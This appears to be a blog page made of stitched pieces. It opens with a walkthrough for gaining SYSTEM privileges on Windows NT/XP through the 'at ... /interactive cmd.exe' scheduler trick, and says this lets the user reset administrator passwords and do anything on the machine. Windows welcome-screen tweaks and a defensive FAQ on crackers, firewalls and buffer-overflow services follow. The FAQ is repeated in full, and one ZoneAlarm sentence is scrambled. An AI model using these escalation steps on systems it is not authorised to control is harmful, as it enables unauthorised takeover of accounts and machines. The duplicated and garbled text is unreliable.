In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.
Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at
If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:
Code:
at 15:25 /interactive “cmd.exe”
Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:
When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:
You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:
Code:
explorer.exe
A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):
System user name on start menu
explorer.exe running under SYSTEM
What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.
ADMINISTRATOR IN WELCOME SCREEN.
When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.
EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!
Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.
What are hackers?
Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Under such a definition, I would gladly brand myself a hacker. (There is in fact more to it than that - hackerdom is an entire culture in its own right.) However, most people understand a hacker to be what is more accurately known as a 'cracker'. Worryingly, people tend to prefer to use the word 'hacker' over the more technically correct 'cracker'. This means that many are afraid to use the word for its correct meaning. On this website, when I refer to a hacker, I actually mean a cracker. This is because I prefer to use language that I feel most people understand, rather than language that is technically correct. If you want to know what a cracker is, please read ahead to the next section...
What are crackers?
Crackers are people who try to gain unauthorised access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer. Obviously, a good protection from this is to change passwords regularly. Another good move is the use of software that supports intruder lockout, where no further passwords are accepted after a certain number of bad passwords have tried. Even the correct password wouldn't allow access. Such blocks are normally released after a period of time has elapsed (eg 15 minutes). Of course, an even better idea is never to put security-sensitive resources on the Internet in the first place. If you don't want something to be accessed from the Internet, then make it so that it is only accessible from your local network, or even just from one computer. However, backdoor programs are programs that can expose files to the Internet that were never meant to be shared with other people. You can protect yourself from these by using a firewall and a good up-to-date anti-virus program. You would normally get such a backdoor program by opening an e-mail attachment containing the backdoor program. It is normal for such a backdoor program to send out more copies of itself to everyone in your address book, so it is possible for someone you know to unintentionally send you a malicious program. Note that this can normally only be done if you are using Microsoft Outlook or Outlook Express. A few backdoor programs can work with any e-mail program by sitting in memory and watching for a connection to a mail server, rather than actually running from within a specific mail program. If you do use Outlook or Outlook Express, and you do not have the correct security patches installed, it may be possible for a malicious program to be executed from an e-mail when you receive it, without the need for you to click on any attachments. Note that the same bug also affects Internet Explorer. A security patch is available for this, but personally I would advise that you use different mail and web browsing software. There are other ways of cracking as well, some more widespread than others. See How do hackers hack? for more information. Note that on most of this website, I refer to 'hackers' instead of 'crackers'. I mean 'crackers'. I explain this in more detail above.
What damage can a hacker do?
This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information. Some backdoor programs even allow a hacker to listen in on your conversations using your computer's microphone if one is attached! Hackers can do great damage to your computer. They could delete vital files from your hard disk, without which your computer could not work. However, you can re-install these from backups (you do keep backups, don't you?) In theory, the absolute worst damage a hacker could do is turn your computer into a large paperweight. It is possible - the CiH virus demonstrated how. This virus attacked your computer using the then new Flash BIOS technology. This capability was intended to be used to upgrade your computer's BIOS. (The BIOS is a program stored on a chip inside your computer. It controls quite a lot of low-level stuff and is a very vital part of your computer. It is the BIOS that does all the memory checks when you turn on, and also performs the first stage in loading your operating system.) However, the virus used this 'feature' to destroy the BIOS. Without the BIOS, the computer can't work. The only way to recover from this would be to replace your computer's motherboard. At the time of writing this, there are no backdoor programs that can do the same thing, but it is easy enough for a hacker to install a virus that does. Since the CiH virus, many BIOSs have a "flash write protect" option in BIOS setup, and/or a jumper setting on the motherboard that has a similar effect. See your motherboard manual for details.
How does a firewall protect me?
Basically, firewalls protect your computer from unauthorised access attempts. There are two kinds of firewall. Networked computers tend to be connected to the Internet through just one or two computers (hence only one Internet connection is required). These computers behave as firewalls by blocking any unauthorised packets. Any other packets are passed on to the computer they are intended for. This kind of firewall is called a corporate firewall. The kind of firewall you may be more familiar with is a personal firewall- this is a program that runs on your computer, and blocks any unauthorised incoming packets. Personally, I use ZoneAlarm. The great thing about ZoneAlarm is that it is easy to configure. Also, it only allows chosen programs to access the Internet- allowing you to block hackers that use standard protocols such as FTP. In case of emergency, it also has an emergency stop button, which allows you to block allfree by private individuals and charities. Businesses, governments, and educational institutions can download ZoneAlarm on the basis of a 60-day free trial. See ZoneLab's website for more information. access to the Internet immediately. ZoneAlarm can be downloaded and used for Remember that although a firewall stops hackers from getting in, it will not remove any existing 'backdoor' software from your machine. For this, you need a good anti-virus product like Norton or Sophos. Also make sure that you use your anti-virus software regularly, and that you keep it up-to-date.
How do I report hackers?
When an access attempt occurs, if you have alert popups turned on, ZoneAlarm will tell you the IP address of the possible hacker. This looks something like 123.123.123.123 (example only). You can use this information to track down and report hackers to their ISP. Bare in mind that you are unlikely to get any response apart from a simple acknowledgement- they have to deal with hundreds of reports like yours every day. Here is a rough guide of how to report hackers (note: some of the programs referred to are only available in Windows):
1. Make a note of all the information ZoneAlarm gives you. If possible, use ZoneAlarm's text log option- many ISPs prefer text log format (personally, I supply ZoneAlarm's text log and an English translation).
2. Select Start, Run... In the Run box, type in "winipcfg" and then click OK. This will tell you what your IP address is (among other things). Write down the IP address.
3. Use an Internet tool like SamSpade's address digger to look up which ISP uses the IP address given in your firewall's log.
4. This will return a lot of technical information. Some ISPs add remarks to this information telling you where to send abuse reports to. Make a note of any such e-mail addresses. If there is no such information, look at the official name for the server (near the top), or the names of the domain name servers. To convert these to an e-mail address, remove everything before the first period, including the period itself, then add 'abuse@' in front of it.
5. Now send an e-mail to the abuse address(es) you have. If the recipient obviously isn't English (eg if the e-mail address ends in .de (Germany) or .fr (France)), write it in their language, if you know it. If not, don't worry, most people speak at least a little English, and the technical language of computers is the same almost anywhere you go!
6. Include in the message what ZoneAlarm told you. Also include your own IP address (this is what winipcfg told you), the date, the time, your time zone (in relation to GMT), and an indication of how accurate your computer's clock is (eg if you set it by the atomic clock every day, say so!)
What is a port scan?
A port scan is, quite simply, a test to see if a computer exists and responds to access attempts on a certain port (eg TCP port 80, used by the HTTP protocol). Port scans, on their own, are quite harmless and have many legitimate uses. However, they also have a malicious use, which is to test to see if any particular backdoor software is running on a computer for the purposes of then using such backdoor software. In my Internet logs, I include all unauthorised port scans of my computer. I tend to describe these port scans as hack attempts, since it is most likely that this is what they are. To be absolutely pedantic, I shouldn't really describe them as such, since there may be other explanations.
What is an IP address?
An IP address is a number that can uniquely identify any computer on the Internet. With the current Internet protocol (IPv4), an IP address is a 32-bit number. That means that as a binary number, it would be stored as 32 ones and zeroes. There are 4,294,967,296 possible IP addresses. However, we humans tend to split IP addresses into four 8-bit numbers, express these numbers using our decimal number system, and separate them with dots. With 8-bit numbers, each number must be a whole number in the range 0 to 255, inclusive. For example, an IP address of 2,071,690,107 would probably be expressed as 123.123.123.123 (example only). Some people might express an IP address in hexadecimal as well (7B7B7B7Bh in this case). The dotted IP address is by far the most common, however. As the Internet grows, plans are being made to increase the size of IP addresses. (The "next" Internet protocol, IPv6, uses 128-bit IP addresses.) The problem with that, of course, is that quite a few Internet protocols would need to be rewritten, since they are designed to work with 32-bit IP addresses. This includes the Internet Protocol itself (IP). Thankfully, Internet packets include an IP version flag, so it would be possible to have both old and new implementations of the IP communicate with each other. (The newer implementation would use the older protocol when communicating with older implementations. Implementations of the IP would know whether a computer was using the older or newer protocol from the version flag. Unfortunately, older implementations would not be able to access anything outside of the 32-bit IP range.) IP addresses can be statically or dynamically allocated. Statically allocated IP addresses always refer to the same computer. However, dynamically allocated IP addresses can refer to different computers at different times. For example, if you have a dial-up Internet connection, your IP address doesn't become unused when you hang up- it is allocated to someone else. When you reconnect, you are allocated a new IP address. This is dynamic allocation.
How can I hack?
I don't like that first person pronoun... I don't mind explaining how hackers hack, but I won't explain how you can hack. This is not a pro-hacking website. This is a computer security site. My aim is not to encourage or assist hacking in any way. I aim to try to inform people of the risks that they may be exposed to, so that they can better protect themselves from these risks. I also provide this website as a resource for those with an academic interest. If you want a rough idea of some of the cracking methods that other people (not you) use, just read on to the next section.
How do hackers hack?
There are many ways in which a hacker can hack. The most common way is by using a backdoor program. See What damage can a hacker do? for more information on these. However, there are some 'special' cases. Click a link below for more information. NetBIOS - UDP 137, UDP 138, TCP 139
ICMP Ping - Internet Control Message Protocol
FTP - TCP 21
rpc.statd - TCP 111, TCP 9704
lpr - TCP 515
HTTP - TCP 80
How can NetBIOS be harmful?
NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely. Not all Windows computers are vulnerable to this kind of attack. If you have a firewall that blocks incoming NetBIOS packets, you are safe. Some network configurations will also be immune. To find out whether you are vulnerable, visit GRC's ShieldsUP!, and click the "Test My Shields!" image half way down the page. Note that GRC will attempt to connect to your computer using NetBIOS - this is just to test whether your computer is vulnerable. GRC will not retain any information about your computer, nor will any damage be done. NetBIOS uses TCP port 139, UDP port 137 and UDP port 138.
How can ICMP Ping be harmful?
ICMP is one of the main protocols that makes the Internet work. It standards for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could then launch a more serious form of attack against a computer. People who do have firewalls normally don't bother to report pings, because they are innocent in themselves - allowing the hacker to continue hacking for quite a long period of time.
How can FTP be harmful?
FTP is a standard Internet protocol, standing for File Transfer Protocol. You might use it for file downloads from some websites. If you have a web page of your own, you might use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers... FTP normally requires some form of authentication for access to private files, or for writing to files. Hackers can get round this by using programs called "backdoor programs". You wouldn't know if you had one of these, unless you used an up-to-date virus scanner regularly. You could get a backdoor program by opening an infected E-mail attachment. FTP backdoor programs, such as Doly Trojan, Fore, and Blade Runner, simply turn your computer into an FTP server, without any authentication. Using a known protocol such as FTP is easier for hackers because the protocol is already defined - not so much new software needs to be written to use it (a normal FTP client could be used - the hacker wouldn't need any specialist software). Also, since FTP has legitimate uses, many firewalls do not block it. Luckily, ZoneAlarm does.
How can rpc.statd be harmful?
This is a problem specific to Linux and Unix. I am not too sure with what precisely rpc.statd should be used for. I do, however, know that it is used by hackers. rpc.statd is typically used as a 'file locking status monitor' (whatever that is) on local area networks. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldn't be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds. That is the problem. rpc.statd uses TCP ports 111 and 9704.
How can lpr be harmful?
This is a similar problem specific to Linux and Unix. lpr is typically used as a printing system. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem (again). See rpc.statd for more information on this problem. Basically, the result of this problem is that data can be written into parts of memory it shouldn't be written to. A skilled hacker could write program code into memory to perform his evil deeds. lpr uses TCP port 515.
How can HTTP be harmful?
HTTP stands for HyperText Transfer Protocol. It is one of the main protocols used on the Internet- it is what you are using right now to view this web page. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the web server with a very long name, parts of the request get written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server. The Code Red worm takes advantage of this. This worm even managed to infect the Microsoft Windows Update site at one point. Despite what I have just said, it is still possible for home users to become infected with such worms, since some people install Personal Web Server without knowing what it is. Some computers even have PWS pre-installed when you buy them. To see if PWS is running on your computer, hover your mouse over each of the icons in the bottom right corner of your screen, until a small description appears. If one of the icons is PWS, right-click it and choose to exit. Then, use Add/Remove Programs in Control Panel to remove the program from your system. Microsoft Personal Web Server is used to serve web pages directly from your computer to the rest of the world. Of course, you would need to be connected to the Internet 24 hours a day in order to do this. Most people will tend to upload Internet material to their ISP, rather than provide access to it directly from their own computer. And just to clear up any remaining confusion: Microsoft Personal Web Server is not required to surf the Internet- all you need to surf the Internet is a web browser and an Internet connection (such as dial-up).
HTTP uses TCP port 80. I am not sure if Microsoft has released a patch to correct the problems I describe.
Technically, a hacker is someone who is enthusiastic about computer programming and all things relating to the technical workings of a computer. Under such a definition, I would gladly brand myself a hacker. (There is in fact more to it than that - hackerdom is an entire culture in its own right.) However, most people understand a hacker to be what is more accurately known as a 'cracker'. Worryingly, people tend to prefer to use the word 'hacker' over the more technically correct 'cracker'. This means that many are afraid to use the word for its correct meaning. On this website, when I refer to a hacker, I actually mean a cracker. This is because I prefer to use language that I feel most people understand, rather than language that is technically correct. If you want to know what a cracker is, please read ahead to the next section...
What are crackers?
Crackers are people who try to gain unauthorised access to computers. This is normally done through the use of a 'backdoor' program installed on your machine. A lot of crackers also try to gain access to resources through the use of password cracking software, which tries billions of passwords to find the correct one for accessing a computer. Obviously, a good protection from this is to change passwords regularly. Another good move is the use of software that supports intruder lockout, where no further passwords are accepted after a certain number of bad passwords have tried. Even the correct password wouldn't allow access. Such blocks are normally released after a period of time has elapsed (eg 15 minutes). Of course, an even better idea is never to put security-sensitive resources on the Internet in the first place. If you don't want something to be accessed from the Internet, then make it so that it is only accessible from your local network, or even just from one computer. However, backdoor programs are programs that can expose files to the Internet that were never meant to be shared with other people. You can protect yourself from these by using a firewall and a good up-to-date anti-virus program. You would normally get such a backdoor program by opening an e-mail attachment containing the backdoor program. It is normal for such a backdoor program to send out more copies of itself to everyone in your address book, so it is possible for someone you know to unintentionally send you a malicious program. Note that this can normally only be done if you are using Microsoft Outlook or Outlook Express. A few backdoor programs can work with any e-mail program by sitting in memory and watching for a connection to a mail server, rather than actually running from within a specific mail program. If you do use Outlook or Outlook Express, and you do not have the correct security patches installed, it may be possible for a malicious program to be executed from an e-mail when you receive it, without the need for you to click on any attachments. Note that the same bug also affects Internet Explorer. A security patch is available for this, but personally I would advise that you use different mail and web browsing software. There are other ways of cracking as well, some more widespread than others. See How do hackers hack? for more information. Note that on most of this website, I refer to 'hackers' instead of 'crackers'. I mean 'crackers'. I explain this in more detail above.
What damage can a hacker do?
This depends upon what backdoor program(s) are hiding on your PC. Different programs can do different amounts of damage. However, most allow a hacker to smuggle another program onto your PC. This means that if a hacker can't do something using the backdoor program, he can easily put something else onto your computer that can. Hackers can see everything you are doing, and can access any file on your disk. Hackers can write new files, delete files, edit files, and do practically anything to a file that could be done to a file. A hacker could install several programs on to your system without your knowledge. Such programs could also be used to steal personal information such as passwords and credit card information. Some backdoor programs even allow a hacker to listen in on your conversations using your computer's microphone if one is attached! Hackers can do great damage to your computer. They could delete vital files from your hard disk, without which your computer could not work. However, you can re-install these from backups (you do keep backups, don't you?) In theory, the absolute worst damage a hacker could do is turn your computer into a large paperweight. It is possible - the CiH virus demonstrated how. This virus attacked your computer using the then new Flash BIOS technology. This capability was intended to be used to upgrade your computer's BIOS. (The BIOS is a program stored on a chip inside your computer. It controls quite a lot of low-level stuff and is a very vital part of your computer. It is the BIOS that does all the memory checks when you turn on, and also performs the first stage in loading your operating system.) However, the virus used this 'feature' to destroy the BIOS. Without the BIOS, the computer can't work. The only way to recover from this would be to replace your computer's motherboard. At the time of writing this, there are no backdoor programs that can do the same thing, but it is easy enough for a hacker to install a virus that does. Since the CiH virus, many BIOSs have a "flash write protect" option in BIOS setup, and/or a jumper setting on the motherboard that has a similar effect. See your motherboard manual for details.
How does a firewall protect me?
Basically, firewalls protect your computer from unauthorised access attempts. There are two kinds of firewall. Networked computers tend to be connected to the Internet through just one or two computers (hence only one Internet connection is required). These computers behave as firewalls by blocking any unauthorised packets. Any other packets are passed on to the computer they are intended for. This kind of firewall is called a corporate firewall. The kind of firewall you may be more familiar with is a personal firewall- this is a program that runs on your computer, and blocks any unauthorised incoming packets. Personally, I use ZoneAlarm. The great thing about ZoneAlarm is that it is easy to configure. Also, it only allows chosen programs to access the Internet- allowing you to block hackers that use standard protocols such as FTP. In case of emergency, it also has an emergency stop button, which allows you to block allfree by private individuals and charities. Businesses, governments, and educational institutions can download ZoneAlarm on the basis of a 60-day free trial. See ZoneLab's website for more information. access to the Internet immediately. ZoneAlarm can be downloaded and used for Remember that although a firewall stops hackers from getting in, it will not remove any existing 'backdoor' software from your machine. For this, you need a good anti-virus product like Norton or Sophos. Also make sure that you use your anti-virus software regularly, and that you keep it up-to-date.
How do I report hackers?
When an access attempt occurs, if you have alert popups turned on, ZoneAlarm will tell you the IP address of the possible hacker. This looks something like 123.123.123.123 (example only). You can use this information to track down and report hackers to their ISP. Bare in mind that you are unlikely to get any response apart from a simple acknowledgement- they have to deal with hundreds of reports like yours every day. Here is a rough guide of how to report hackers (note: some of the programs referred to are only available in Windows):
1. Make a note of all the information ZoneAlarm gives you. If possible, use ZoneAlarm's text log option- many ISPs prefer text log format (personally, I supply ZoneAlarm's text log and an English translation).
2. Select Start, Run... In the Run box, type in "winipcfg" and then click OK. This will tell you what your IP address is (among other things). Write down the IP address.
3. Use an Internet tool like SamSpade's address digger to look up which ISP uses the IP address given in your firewall's log.
4. This will return a lot of technical information. Some ISPs add remarks to this information telling you where to send abuse reports to. Make a note of any such e-mail addresses. If there is no such information, look at the official name for the server (near the top), or the names of the domain name servers. To convert these to an e-mail address, remove everything before the first period, including the period itself, then add 'abuse@' in front of it.
5. Now send an e-mail to the abuse address(es) you have. If the recipient obviously isn't English (eg if the e-mail address ends in .de (Germany) or .fr (France)), write it in their language, if you know it. If not, don't worry, most people speak at least a little English, and the technical language of computers is the same almost anywhere you go!
6. Include in the message what ZoneAlarm told you. Also include your own IP address (this is what winipcfg told you), the date, the time, your time zone (in relation to GMT), and an indication of how accurate your computer's clock is (eg if you set it by the atomic clock every day, say so!)
What is a port scan?
A port scan is, quite simply, a test to see if a computer exists and responds to access attempts on a certain port (eg TCP port 80, used by the HTTP protocol). Port scans, on their own, are quite harmless and have many legitimate uses. However, they also have a malicious use, which is to test to see if any particular backdoor software is running on a computer for the purposes of then using such backdoor software. In my Internet logs, I include all unauthorised port scans of my computer. I tend to describe these port scans as hack attempts, since it is most likely that this is what they are. To be absolutely pedantic, I shouldn't really describe them as such, since there may be other explanations.
What is an IP address?
An IP address is a number that can uniquely identify any computer on the Internet. With the current Internet protocol (IPv4), an IP address is a 32-bit number. That means that as a binary number, it would be stored as 32 ones and zeroes. There are 4,294,967,296 possible IP addresses. However, we humans tend to split IP addresses into four 8-bit numbers, express these numbers using our decimal number system, and separate them with dots. With 8-bit numbers, each number must be a whole number in the range 0 to 255, inclusive. For example, an IP address of 2,071,690,107 would probably be expressed as 123.123.123.123 (example only). Some people might express an IP address in hexadecimal as well (7B7B7B7Bh in this case). The dotted IP address is by far the most common, however. As the Internet grows, plans are being made to increase the size of IP addresses. (The "next" Internet protocol, IPv6, uses 128-bit IP addresses.) The problem with that, of course, is that quite a few Internet protocols would need to be rewritten, since they are designed to work with 32-bit IP addresses. This includes the Internet Protocol itself (IP). Thankfully, Internet packets include an IP version flag, so it would be possible to have both old and new implementations of the IP communicate with each other. (The newer implementation would use the older protocol when communicating with older implementations. Implementations of the IP would know whether a computer was using the older or newer protocol from the version flag. Unfortunately, older implementations would not be able to access anything outside of the 32-bit IP range.) IP addresses can be statically or dynamically allocated. Statically allocated IP addresses always refer to the same computer. However, dynamically allocated IP addresses can refer to different computers at different times. For example, if you have a dial-up Internet connection, your IP address doesn't become unused when you hang up- it is allocated to someone else. When you reconnect, you are allocated a new IP address. This is dynamic allocation.
How can I hack?
I don't like that first person pronoun... I don't mind explaining how hackers hack, but I won't explain how you can hack. This is not a pro-hacking website. This is a computer security site. My aim is not to encourage or assist hacking in any way. I aim to try to inform people of the risks that they may be exposed to, so that they can better protect themselves from these risks. I also provide this website as a resource for those with an academic interest. If you want a rough idea of some of the cracking methods that other people (not you) use, just read on to the next section.
How do hackers hack?
There are many ways in which a hacker can hack. The most common way is by using a backdoor program. See What damage can a hacker do? for more information on these. However, there are some 'special' cases. Click a link below for more information. NetBIOS - UDP 137, UDP 138, TCP 139
ICMP Ping - Internet Control Message Protocol
FTP - TCP 21
rpc.statd - TCP 111, TCP 9704
lpr - TCP 515
HTTP - TCP 80
How can NetBIOS be harmful?
NetBIOS hacks are the worst kind, since they don't require you to have any hidden backdoor program running on your computer. This kind of hack exploits a bug in Windows 9x. NetBIOS is meant to be used on local area networks, so machines on that network can share information. Unfortunately, the bug is that NetBIOS can also be used across the Internet - so a hacker can access your machine remotely. Not all Windows computers are vulnerable to this kind of attack. If you have a firewall that blocks incoming NetBIOS packets, you are safe. Some network configurations will also be immune. To find out whether you are vulnerable, visit GRC's ShieldsUP!, and click the "Test My Shields!" image half way down the page. Note that GRC will attempt to connect to your computer using NetBIOS - this is just to test whether your computer is vulnerable. GRC will not retain any information about your computer, nor will any damage be done. NetBIOS uses TCP port 139, UDP port 137 and UDP port 138.
How can ICMP Ping be harmful?
ICMP is one of the main protocols that makes the Internet work. It standards for Internet Control Message Protocol. 'Ping' is one of the commands that can be sent to a computer using ICMP. Ordinarily, a computer would respond to this ping, telling the sender that the computer does exist. This is all pings are meant to do. Pings may seem harmless enough, but a large number of pings can make a Denial-of-Service attack, which overloads a computer. Also, hackers can use pings to see if a computer exists and does not have a firewall (firewalls can block pings). If a computer responds to a ping, then the hacker could then launch a more serious form of attack against a computer. People who do have firewalls normally don't bother to report pings, because they are innocent in themselves - allowing the hacker to continue hacking for quite a long period of time.
How can FTP be harmful?
FTP is a standard Internet protocol, standing for File Transfer Protocol. You might use it for file downloads from some websites. If you have a web page of your own, you might use FTP to upload it from your home computer to the web server. However, FTP can also be used by some hackers... FTP normally requires some form of authentication for access to private files, or for writing to files. Hackers can get round this by using programs called "backdoor programs". You wouldn't know if you had one of these, unless you used an up-to-date virus scanner regularly. You could get a backdoor program by opening an infected E-mail attachment. FTP backdoor programs, such as Doly Trojan, Fore, and Blade Runner, simply turn your computer into an FTP server, without any authentication. Using a known protocol such as FTP is easier for hackers because the protocol is already defined - not so much new software needs to be written to use it (a normal FTP client could be used - the hacker wouldn't need any specialist software). Also, since FTP has legitimate uses, many firewalls do not block it. Luckily, ZoneAlarm does.
How can rpc.statd be harmful?
This is a problem specific to Linux and Unix. I am not too sure with what precisely rpc.statd should be used for. I do, however, know that it is used by hackers. rpc.statd is typically used as a 'file locking status monitor' (whatever that is) on local area networks. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem. This is where a fixed amount of memory is set aside for storage of data. If data is received that is larger than this buffer, the program should truncate the data or send back an error, or at least do something other than ignore the problem. Unfortunately, the data overflows the memory that has been allocated to it, and the data is written into parts of memory it shouldn't be in. This can cause crashes of various different kinds. However, a skilled hacker could write bits of program code into memory that may be executed to perform the hacker's evil deeds. That is the problem. rpc.statd uses TCP ports 111 and 9704.
How can lpr be harmful?
This is a similar problem specific to Linux and Unix. lpr is typically used as a printing system. Not all versions of Linux/Unix use it, and some versions have had the security glitch I am about to describe fixed. The problem is the infamous unchecked buffer overflow problem (again). See rpc.statd for more information on this problem. Basically, the result of this problem is that data can be written into parts of memory it shouldn't be written to. A skilled hacker could write program code into memory to perform his evil deeds. lpr uses TCP port 515.
How can HTTP be harmful?
HTTP stands for HyperText Transfer Protocol. It is one of the main protocols used on the Internet- it is what you are using right now to view this web page. HTTP hacks can only be harmful if you are using Microsoft web server software, such as Personal Web Server. There is a bug in this software called an 'unchecked buffer overflow'. If a user makes a request for a file on the web server with a very long name, parts of the request get written into parts of memory that contain active program code. A malicious user could use this to run any program they want on the server. The Code Red worm takes advantage of this. This worm even managed to infect the Microsoft Windows Update site at one point. Despite what I have just said, it is still possible for home users to become infected with such worms, since some people install Personal Web Server without knowing what it is. Some computers even have PWS pre-installed when you buy them. To see if PWS is running on your computer, hover your mouse over each of the icons in the bottom right corner of your screen, until a small description appears. If one of the icons is PWS, right-click it and choose to exit. Then, use Add/Remove Programs in Control Panel to remove the program from your system. Microsoft Personal Web Server is used to serve web pages directly from your computer to the rest of the world. Of course, you would need to be connected to the Internet 24 hours a day in order to do this. Most people will tend to upload Internet material to their ISP, rather than provide access to it directly from their own computer. And just to clear up any remaining confusion: Microsoft Personal Web Server is not required to surf the Internet- all you need to surf the Internet is a web browser and an Internet connection (such as dial-up).
HTTP uses TCP port 80. I am not sure if Microsoft has released a patch to correct the problems I describe.
Subscribe to:
Posts (Atom)